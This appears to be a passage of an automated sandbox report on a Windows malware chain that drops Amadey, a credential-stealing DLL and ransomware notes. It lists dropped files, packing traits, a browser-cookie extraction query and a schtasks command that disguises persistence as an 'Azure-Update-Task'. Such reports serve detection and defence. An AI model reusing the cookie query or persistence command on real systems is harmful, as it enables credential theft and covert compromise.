                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
                Source: aafg31.exe, 00000015.00000003.569051255.000001E2901A6000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.566066441.000001E2901A6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;pf":"b52%,L
                Source: aafg31.exe, 00000015.00000003.509760935.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.511247742.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;3ruyIBy79Jhn2KD0MAHndkY5HfXu3FjrUGsXNx+JmqknGWU3y9lQI954Uudblbq3uoFSjReAoFdDgjV4N7oqNL5VJJqg3EYSBvO5Kx47gKSQb2MsIi4GPGwN2iMeKnQ6xbYHfT5EdLH4/NAxqDRgOa1UR+4PTom6c98B13N2A7ORixlv67W5j7NZ8EATp03Hpn9wtWI/ew/j5mPxU6^
                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
                Source: aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;ce3":2623,"machinee,
                Source: aafg31.exe, 00000015.00000002.618169870.000001E2901A6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;uV
                Source: aafg31.exe, 00000015.00000002.618777053.000001E291A70000.00000004.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.632373221.000001E291FA0000.00000040.00001000.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.635269175.000001E292110000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
                Source: aafg31.exe, 00000015.00000003.519312532.000001E2901BF000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.522708339.000001E2901BE000.00000004.00000020.00020000.00000000.sdmp, aafg31.exe, 00000015.00000003.525115806.000001E2901BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SELECT creation_utc,host_key,name,value,path,expires_utc,is_secure,is_httponly,last_access_utc,has_expires,is_persistent,priority,hex(encrypted_value) encrypted_value,samesite,source_scheme,source_port,is_same_party FROM cookies;YqQj2ohortname":"
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\5DA0.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_024A57C6 CreateToolhelp32Snapshot,Module32First,
                Source: 3C54.exe.1.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                Source: 5DA0.exe.1.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                Source: 6FA9.exe.1.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                Source: 9F31.exe.1.dr, Stub/Program.csBase64 encoded string: 'U09GVFdBUkVcTWljcm9zb2Z0XFdpbmRvd3NcQ3VycmVudFZlcnNpb25cUnVu'
                Source: C:\Users\user\AppData\Local\Temp\D804.exeMutant created: \Sessions\1\BaseNamedObjects\{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeMutant created: \Sessions\1\BaseNamedObjects\07c6bc37dc50874878dcb010336ed906
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:1868:64:WilError_01
                Source: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeMutant created: \Sessions\1\BaseNamedObjects\M5/610HP/STAGE2
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess68
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5228:120:WilError_01
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCommand line argument: T#0y
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCommand line argument: #"#
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCommand line argument: .d|1
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCommand line argument: K[
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCommand line argument: kernel32.dll
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\explorer.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\aafg31.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\A170.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\A170.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\913F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: C:\Users\user\AppData\Local\Temp\913F.exeFile read: C:\Windows\System32\drivers\etc\hosts
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                Source: C:\Users\user\Desktop\01860199.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                Source: 01860199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: 01860199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: 01860199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: 01860199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: 01860199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: 01860199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: 01860199.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdbeex.pdb000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
                Source: Binary string: P:\Target\x64\ship\groove\x-none\grooveex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
                Source: Binary string: helppane.pdb source: 3C54.exe, 00000014.00000002.507574434.0000000003F70000.00000004.00000800.00020000.00000000.sdmp, aafg31.exe, 00000015.00000002.644812591.00007FF777031000.00000020.00000001.01000000.0000000F.sdmp
                Source: Binary string: D:\Mktmp\Amadey\Release\Amadey.pdb source: NewPlayer.exe, 00000016.00000002.476201608.0000000000091000.00000002.00000001.01000000.00000011.sdmp, NewPlayer.exe, 00000016.00000000.461052075.0000000000091000.00000002.00000001.01000000.00000011.sdmp
                Source: Binary string: C:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: AC:\sucagidupusehi\pahopigap\5\muhoyawa.pdb source: 01860199.exe, 00000000.00000000.351185873.0000000000401000.00000020.00000001.01000000.00000003.sdmp, hwgujdv, 00000004.00000000.433612531.0000000000401000.00000020.00000001.01000000.00000006.sdmp
                Source: Binary string: TEST_mi_exe_stub.pdb source: D804.exe, 00000013.00000003.473635062.0000000009A20000.00000004.00001000.00020000.00000000.sdmp
                Source: Binary string: C:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp, D804.exe
                Source: Binary string: CGC:\huvuvig\juhohan\bamakexuvoni\vaxilil\javefi\5\liguvihahoca\suci.pdb source: explorer.exe, 00000001.00000003.439363024.0000000005973000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.438814937.00000000157FF000.00000004.00000010.00020000.00000000.sdmp
                Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: D804.exe, 00000005.00000002.442867169.0000000002690000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000006.00000002.449975040.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 0000000D.00000002.450667818.0000000002530000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000010.00000002.617846506.0000000000400000.00000040.00000400.00020000.00000000.sdmp, D804.exe, 00000012.00000002.451684545.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 00000013.00000002.617779609.0000000000400000.00000040.00000400.00020000.00000000.sdmp, B46F.exe, 00000019.00000002.474131384.00000000024D0000.00000040.00001000.00020000.00000000.sdmp, B46F.exe, 0000001A.00000002.488867120.0000000000400000.00000040.00000400.00020000.00000000.sdmp, A170.exe, 0000001B.00000002.493740298.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, D804.exe, 0000001C.00000002.491035809.0000000002460000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: eex.pdb source: explorer.exe, 00000001.00000000.378518677.00007FFC1B351000.00000020.00000001.01000000.00000005.sdmp
                Source: Binary string: )5C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp
                Source: Binary string: C:\rusuxenalo\dutaz jale\puyenotak\tipibu.pdb source: explorer.exe, 00000001.00000003.443261343.0000000005975000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000003.443214371.0000000008581000.00000004.00000001.00020000.00000000.sdmp, C861.exe, 00000007.00000000.443424351.0000000000401000.00000020.00000001.01000000.00000009.sdmp

                Data Obfuscation

                barindex
                Source: C:\Users\user\AppData\Local\Temp\D804.exeUnpacked PE file: 6.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeUnpacked PE file: 16.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\D804.exeUnpacked PE file: 19.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeUnpacked PE file: 26.2.B46F.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\A170.exeUnpacked PE file: 29.2.A170.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeUnpacked PE file: 31.2.D804.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeUnpacked PE file: 32.2.build2.exe.400000.0.unpack
                Source: C:\Users\user\AppData\Local\Temp\913F.exeUnpacked PE file: 37.2.913F.exe.400000.0.unpack
                Source: C:\Users\user\Desktop\01860199.exeUnpacked PE file: 0.2.01860199.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Roaming\hwgujdvUnpacked PE file: 4.2.hwgujdv.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\Temp\D804.exeUnpacked PE file: 6.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\C861.exeUnpacked PE file: 7.2.C861.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeUnpacked PE file: 16.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\D804.exeUnpacked PE file: 19.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\B46F.exeUnpacked PE file: 26.2.B46F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\A170.exeUnpacked PE file: 29.2.A170.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeUnpacked PE file: 31.2.D804.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeUnpacked PE file: 32.2.build2.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\913F.exeUnpacked PE file: 37.2.913F.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
                Source: C:\Users\user\AppData\Local\Temp\F4F7.exeUnpacked PE file: 38.2.F4F7.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;.reloc:R; vs .text:EW;
                Source: C:\Users\user\Desktop\01860199.exeCode function: 0_2_0040C757 push ebx; ret
                Source: C:\Users\user\AppData\Roaming\hwgujdvCode function: 4_2_0040C757 push ebx; ret
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_00407449 push ecx; ret
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_00403770 push ecx; mov dword ptr [esp], 00000000h
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_024A80AF push ecx; retf
                Source: C:\Users\user\AppData\Local\Temp\D804.exeCode function: 5_2_0040D6B0 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,
                Source: XandETC.exe.20.drStatic PE information: section name: .xdata
                Source: cred64[1].dll.35.drStatic PE information: section name: _RDATA
                Source: cred64.dll.35.drStatic PE information: section name: _RDATA
                Source: cred64.dll.35.drStatic PE information: real checksum: 0x0 should be: 0x10ec1f
                Source: build3[1].exe.19.drStatic PE information: real checksum: 0x0 should be: 0x3ca6
                Source: mnolyk.exe.22.drStatic PE information: real checksum: 0x0 should be: 0x462b6
                Source: NewPlayer.exe.20.drStatic PE information: real checksum: 0x0 should be: 0x462b6
                Source: 5DA0.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x4e4913
                Source: aafg31.exe.20.drStatic PE information: real checksum: 0xfc51b should be: 0xfd56a
                Source: mstsca.exe.30.drStatic PE information: real checksum: 0x0 should be: 0x3ca6
                Source: 6FA9.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x4e4913
                Source: 3C54.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x4e4913
                Source: 9F31.exe.1.drStatic PE information: real checksum: 0x0 should be: 0x4e4913
                Source: cred64[1].dll.35.drStatic PE information: real checksum: 0x0 should be: 0x10ec1f
                Source: build3.exe.19.drStatic PE information: real checksum: 0x0 should be: 0x3ca6
                Source: initial sampleStatic PE information: section name: .text entropy: 7.582759753211569
                Source: initial sampleStatic PE information: section name: .text entropy: 7.957132142496877
                Source: initial sampleStatic PE information: section name: .text entropy: 7.5847412014460565
                Source: initial sampleStatic PE information: section name: .text entropy: 7.957132142496877
                Source: initial sampleStatic PE information: section name: .text entropy: 7.5847412014460565
                Source: initial sampleStatic PE information: section name: .text entropy: 7.956564628368373
                Source: initial sampleStatic PE information: section name: .text entropy: 7.957132142496877
                Source: initial sampleStatic PE information: section name: .text entropy: 7.956564628368373
                Source: initial sampleStatic PE information: section name: .text entropy: 7.956564628368373
                Source: initial sampleStatic PE information: section name: .text entropy: 7.5847412014460565
                Source: initial sampleStatic PE information: section name: .text entropy: 7.957132142496877
                Source: initial sampleStatic PE information: section name: .text entropy: 7.956564628368373
                Source: initial sampleStatic PE information: section name: .text entropy: 7.5847412014460565
                Source: initial sampleStatic PE information: section name: .text entropy: 7.957132142496877
                Source: initial sampleStatic PE information: section name: .text entropy: 7.890261806957562
                Source: initial sampleStatic PE information: section name: .text entropy: 7.9249481955685654
                Source: initial sampleStatic PE information: section name: .text entropy: 7.956564628368373
                Source: initial sampleStatic PE information: section name: .text entropy: 7.582759753211569
                Source: initial sampleStatic PE information: section name: .text entropy: 7.5847412014460565
                Source: initial sampleStatic PE information: section name: .text entropy: 7.957132142496877

                Persistence and Installation Behavior

                barindex
                Source: Yara matchFile source: 00000023.00000003.612344653.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.618034875.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.520904242.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000003.520904242.0000000000C47000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.618034875.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000023.00000002.618034875.0000000000BE5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hwgujdvJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ewgujdvJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D689.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build2[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\build3[1].exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\Downloads\ChromeSetup.exe.vapo (copy)
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\EA44.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\BC2.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build2.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\6FA9.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\673.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\hwgujdvJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A170.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\Downloads\ChromeSetup.exe
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3E02.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\CBE6.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ewgujdvJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\F4F7.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\57DC.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\C861.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\3C54.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\NewPlayer.exeFile created: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeFile created: C:\Users\user\AppData\Roaming\07c6bc37dc5087\cred64.dllJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\A3D5.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\D804.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B46F.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\913F.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\B8C8.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeFile created: C:\Users\user\AppData\Local\Temp\aafg31.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeFile created: C:\Users\user\AppData\Local\Temp\XandETC.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\5DA0.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\3C54.exeFile created: C:\Users\user\AppData\Local\Temp\NewPlayer.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9F31.exeJump to dropped file
                Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\388B.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\AppData\Local\de8c49a6-0e90-48ec-87c8-3cd1f6f0601e\D804.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\6d73a97b0c\mnolyk.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cred64[1].dllJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\_readme.txt
                Source: C:\Users\user\AppData\Local\Temp\D804.exeFile created: C:\Users\user\_readme.txt

                Boot Survival

                barindex
                Source: C:\Users\user\AppData\Local\0e111cbe-1163-4b86-ad03-032e194ee525\build3.exeProcess created: C:\Windows\SysWOW64\schtasks.exe /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\user\AppData\Roaming\Microsoft\Network\mstsca.exe"
